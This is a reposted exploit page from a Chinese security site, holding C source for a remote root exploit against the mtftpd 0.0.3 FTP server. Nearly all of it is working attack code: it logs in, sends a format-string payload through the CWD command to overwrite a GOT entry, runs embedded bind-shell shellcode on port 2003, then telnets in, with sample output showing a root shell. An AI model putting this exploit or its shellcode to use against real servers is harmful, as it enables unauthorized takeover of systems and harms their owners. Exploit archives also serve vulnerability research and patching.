首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mtftpd Server v0.0.3 Remote Buffer Overflow Remote Root Exploit
来源:http://unl0ck.org 作者:darkeagle 发布时间:2005-03-31  

Mtftpd Server v0.0.3 Remote Buffer Overflow Remote Root Exploit

/*
\ mtftpd <= 0.0.3 remote root exploit
/ by darkeagle
\
/ discovered by darkeagle - xx.10.04
\
/ (c) unl0ck research team [http://unl0ck.org]
\
/ greetz: unl0ckerZ, rosielloZ, nosystemZ, etc..
\
/ [darkeagle@localhost darkeagle]$ ./0x666-ftpd -a 127.0.0.1 -p beautifulgirlz -u darkeagle


mtftpd <= 0.0.3 remote root exploit
by darkeagle [http://unl0ck.org]

[`] GOT: 0x804fcb0
[`] Retaddr: 0xbffff8d8
[`] Username: darkeagle
[`] Password: beautifulgirlz
[`] IP: 127.0.0.1
[`] Port: 21
[`] Creating SOCKET structure...
[+] Structure Done!
[`] Connecting... OK!
[+] Sending LOGIN DATA
[+] Successfully logged!
[`] Creating EviL Data... OK!
[`] Sending... OK!
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id; uname -a;
uid=0(root) gid=0(root) groups=0(root)
Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
: command not found

\
/
\ *--------------------------------------------*
/ mailto: darkeagle [at] linkin-park [dot] cc
\ darkeagle [at] unl0ck [dot] org
/ *-------------------------------------------*
\
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 21
#define doit( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}

#define GOT_ADDR 0x0804fcb0
#define RETADDR 0xbffff8d8

char shellcode[] = //binds 2003 port
"\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
"\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
"\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
"\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
"\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
"\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
"\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
"\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

int usage ( char *proga )
{
printf("\n\nmtftpd <= 0.0.3 remote root exploit\n");
printf("by darkeagle\n");
printf("\nusage: %s <options>\n\nOptions:\n-a <ip_address>\n-p <password>
\n-u <username>\n-g <gotaddr>\n-r <retaddr>\n\n", proga);
printf("EnJoY!\n\n");
exit(0);
}

char *
build_un( unsigned int retaddr, unsigned int offset, unsigned int base, long figure )
{
char * buf;
unsigned int length = 128;
unsigned char b0, b1, b2, b3;
int start = 256;
doit( b0, b1, b2, b3, retaddr );

if ( !(buf = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( buf, 0, length );

b3 -= figure;
b2 -= figure;
b1 -= figure;
b0 -= figure;

snprintf( buf, length,
"%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
b3 - (sizeof( size_t ) * 4) + start - base, offset,
b2 - b3 + start, offset + 1,
b1 - b2 + start, offset + 2,
b0 - b1 + start, offset + 3 );

return buf;
}

int
main( int argc, char * argv[] )
{
char opt;
char * fmt;
char * endian;
unsigned long locaddr, retaddr;
unsigned int offset, base, align = 0;
unsigned char b0, b1, b2, b3;
int length, ch;
char *username = NULL;
char *password = NULL, *ip = NULL;
char evil[3000];
int f_got = 0;
int f_retaddr = 0;
char databuf[300];
struct sockaddr_in final;
int Socket;
char exec[300];
char recva[200];

if ( argc < 6 ) { usage(argv[0]); }
printf("\n\nmtftpd <= 0.0.3 remote root exploit\n");
printf("by darkeagle [http://unl0ck.org]\n");
while ((opt = getopt(argc, argv,"p:u:a:g:r:")) != EOF) {
switch (opt) {
case 'p':
password = optarg;
break;
case 'a':
ip = optarg;
break;
case 'g':
f_got = strtoul(optarg,NULL,0);
break;
case 'r':
f_retaddr = strtoul(optarg,NULL,0);
break;
case 'u':
username = optarg;
break;
default:
usage(argv[0]);
break;
}
}

if ( f_got == 0 || f_retaddr == 0 )
{
f_got = GOT_ADDR;
f_retaddr = RETADDR;
}

printf("\n [`] GOT: 0x%x\n [`] Retaddr: 0x%x\n [`] Username: %s\n [`] Password:
%s\n [`] IP: %s\n [`] Port: %d\n", f_got, f_retaddr, username, password, ip, 21);

printf(" [`] Creating SOCKET structure...\n");

final.sin_family = AF_INET;
final.sin_port = htons(PORT);
final.sin_addr.s_addr = inet_addr(ip);

Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);

printf(" [+] Structure Done!\n");

printf(" [`] Connecting...\t");

if ( connect(Socket, (struct sockaddr*)&final, sizeof(final)) == -1 ) { printf("FAILED!\n"); exit(0); }

printf("OK!\n");

printf(" [+] Sending LOGIN DATA\n");

snprintf(databuf, 300, "USER %s\r\n\r\nPASS %s\r\n\r\n", username, password);

send(Socket, databuf, strlen(databuf), 0);
recv(Socket, recva, sizeof(recva), 0);

if ( strstr(recva, "230" ) ) { printf(" [+] Successfully logged!\n"); } else {
printf(" [-] Invalid login or password!\n\n");
exit(0); }

printf(" [`] Creating EviL Data...\t");
length = ( sizeof( size_t ) * 16 ) + 1;

if ( !(endian = (char *)malloc(length * sizeof(char))) ) {
fprintf( stderr, "Can't allocate buffer (%d)\n", length );
exit( -1 );
}
memset( endian, 0, length );

ch = 0;
locaddr = f_got; // syslog GOT
retaddr = f_retaddr; // return address to shellcode
offset = 12; // offset to 0x2e414141 - CWD AAAA%12$x
base = 4;
//locaddr += 0x4;

doit( b0, b1, b2, b3, locaddr );

if ( base%4 ) {
align = 4 - ( base%4 );
base += align;
}

strcat(endian, "U");

snprintf( endian+strlen(endian), length,
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c"
"%c%c%c%c",
b3, b2, b1, b0,
b3 + 1, b2, b1, b0,
b3 + 2, b2, b1, b0,
b3 + 3, b2, b1, b0 );

fmt = build_un( retaddr, offset, base, 0xF + 0x1 );

memset(fmt+strlen(fmt), 0x42, 48);
strcat(fmt, shellcode);
sprintf(evil, "CWD %s\r\n\r\n", fmt);

if ( strlen(evil) >= 256 ) { printf("FAILED!\n"); exit(0); }

printf("OK!\n");
printf(" [`] Sending...\t");
send(Socket, evil, strlen(evil), 0);
printf("OK!\n");
sprintf(exec, "telnet %s 2003\n", ip);
printf(" [+] Connecting to shell...\t");
sleep(2);
system(exec);
printf("FAILED!\n\n");
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PunBB v1.2.2 functions.php Rem
·Cyrus imapd v2.2.8 Remote Comm
·FunLabs Games Multiple Vulnera
·Linux Kernel v2.6.10 Remote De
·Smail preparse_address_1() Hea
·Linux Kernel v2.6.10 Remote De
·Tincat Buffer Overflow
·BakBone NetVault configure.cfg
·OpenMosixView Multiple Race Co
·BakBone NetVault 7.x Remote He
·LimeWire File Disclosure Explo
·Microsoft WINS Remote Heap Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved